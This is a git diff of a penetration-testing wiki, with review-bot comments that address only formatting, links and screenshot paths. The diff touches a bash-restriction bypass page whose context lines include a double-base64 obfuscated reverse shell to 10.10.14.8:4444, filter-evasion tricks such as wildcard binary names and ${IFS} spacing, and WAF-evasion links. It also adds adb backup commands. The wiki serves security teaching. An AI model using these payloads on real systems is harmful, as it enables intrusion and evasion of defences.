diff --git a/.gitbook/assets/image (435).png b/.gitbook/assets/image (436) (1).png similarity index 100% rename from .gitbook/assets/image (435).png rename to .gitbook/assets/image (436) (1).png diff --git a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md index 0a63a7a65..7a3e52419 100644 --- a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md +++ b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md @@ -1,13 +1,16 @@ -# WAF Evasion / Bypass Bash Restrictions +# Bypass Bash Restrictions ## Reverse Shell -```sh + +```bash # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g' #echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h ``` + ## Bypass Paths and forbidden commands -```sh + +```bash # Question mark binary substitution /usr/bin/p?ng # /usr/bin/ping nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost @@ -46,7 +49,8 @@ whoa # This will throw an error ``` ## Bypass forbidden spaces -```sh + +```bash # {form} {cat,lol.txt} # cat lol.txt {echo,test} # echo test 
@@ -77,16 +81,19 @@ uname!-1\-a # This equals to uname -a ``` ## Bypass IPs -```sh + +```bash # Decimal IPs 127.0.0.1 == 2130706433 ``` ## References & More -{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits" %} -{% embed url="https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet" %} +{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection\#exploits" caption="" %} -{% embed url="https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0" %} +{% embed url="https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet" caption="" %} + +{% embed url="https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0" caption="" %} + +{% embed url="https://www.secjuice.com/web-application-firewall-waf-evasion/" caption="" %} -{% embed url="https://www.secjuice.com/web-application-firewall-waf-evasion/" %} diff --git a/mobile-apps-pentesting/android-app-pentesting/README.md b/mobile-apps-pentesting/android-app-pentesting/README.md index fae6ddd53..7aa976513 100644 --- a/mobile-apps-pentesting/android-app-pentesting/README.md +++ b/mobile-apps-pentesting/android-app-pentesting/README.md @@ -97,7 +97,7 @@ In this case you could try to abuse the functionality creating a web with the fo In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**. -![](../../.gitbook/assets/image%20%28436%29.png) +![](../../.gitbook/assets/image%20%28436%29%20%281%29.png) Learn how to [call deep links without using HTML pages below](./#exploiting-schemes-deep-links). 
@@ -455,7 +455,7 @@ _Note that you can **omit the package name** and the mobile will automatically c In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**. -![](../../.gitbook/assets/image%20%28435%29.png) +![](../../.gitbook/assets/image%20%28436%29.png) #### Sensitive info diff --git a/mobile-apps-pentesting/android-app-pentesting/adb-commands.md b/mobile-apps-pentesting/android-app-pentesting/adb-commands.md index 19a22ef24..a774bd531 100644 --- a/mobile-apps-pentesting/android-app-pentesting/adb-commands.md +++ b/mobile-apps-pentesting/android-app-pentesting/adb-commands.md @@ -348,5 +348,9 @@ adb backup [-apk] [-shared] [-system] [-all] -f file.backup # -shared -- Include removable storage # -system -- Include system Applciations # -all -- Include all the applications + +adb shell pm list packages -f -3 #List packages +adb backup -f myapp.ab -apk com.myapp # backup on one device +adb restore myapp.ab # restore to the same or any other device ```
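Review bot: in the `@@ -1,13 +1,16 @@` hunk of bypass-bash-restrictions.md, retagging the fences from `sh` to `bash` is correct, because the snippets rely on bash-only features (`/dev/tcp/10.10.14.8/4444` in the reverse-shell block, brace expansion such as `{cat,lol.txt}` in the forbidden-spaces block, `${IFS}` substitution), but the heading change from `# WAF Evasion / Bypass Bash Restrictions` to `# Bypass Bash Restrictions` drops the WAF context while the file's References section still embeds four WAF-evasion links; consider keeping "WAF Evasion" in the title or adding one intro line so the references do not read as unrelated.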
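Review bot: in the `@@ -77,16 +81,19 @@` hunk, the first embed URL changes from `...Command%20Injection#exploits` to `...Command%20Injection\#exploits`; the backslash before `#` is likely to be emitted literally by the embed tag and break the anchor, so verify the rendered link still resolves to the `#exploits` section, or drop the escape. The added `caption=""` attributes are empty on all four embeds; either give them a short caption or leave the attribute out for consistency with the rest of the repository.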
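Review bot: in the `@@ -97,7 +97,7 @@` hunk of android-app-pentesting/README.md, the new path `image%20%28436%29%20%281%29.png` does match the rename in the first file header (`image (435).png` to `image (436) (1).png`), but note that the context paragraph here ("go to the activity called by the deeplink and search the function `onNewIntent`") is identical to the one in the `@@ -455,7 +455,7 @@` hunk; if the two sections are meant to show different screenshots, state that in the surrounding text, otherwise consider deduplicating the paragraph.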
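Review bot: in the `@@ -455,7 +455,7 @@` hunk, the reference moves from `image%20%28435%29.png` to `image%20%28436%29.png`, which is the file the line-97 paragraph used to reference, while line 97 now points at the renamed old `(435)` file; the net effect of the two hunks is that the two identical paragraphs have swapped screenshots. Confirm this swap is intended rather than an artifact of the rename, since both paragraphs describe the same `onNewIntent` lookup.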
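Review bot: in the `@@ -348,5 +348,9 @@` hunk of adb-commands.md, the three added lines do not mention that `adb backup`/`adb restore` only cover an app whose manifest allows backup (`android:allowBackup`), and that both commands require the user to confirm the operation on the device screen; a one-line comment on `adb backup -f myapp.ab -apk com.myapp # backup on one device` would save readers a confusing empty `.ab` file. Minor style: `#List packages` lacks the space after `#` used by the other comments, and the context line `# -system -- Include system Applciations` has a typo ("Applciations") that could be fixed while touching this block.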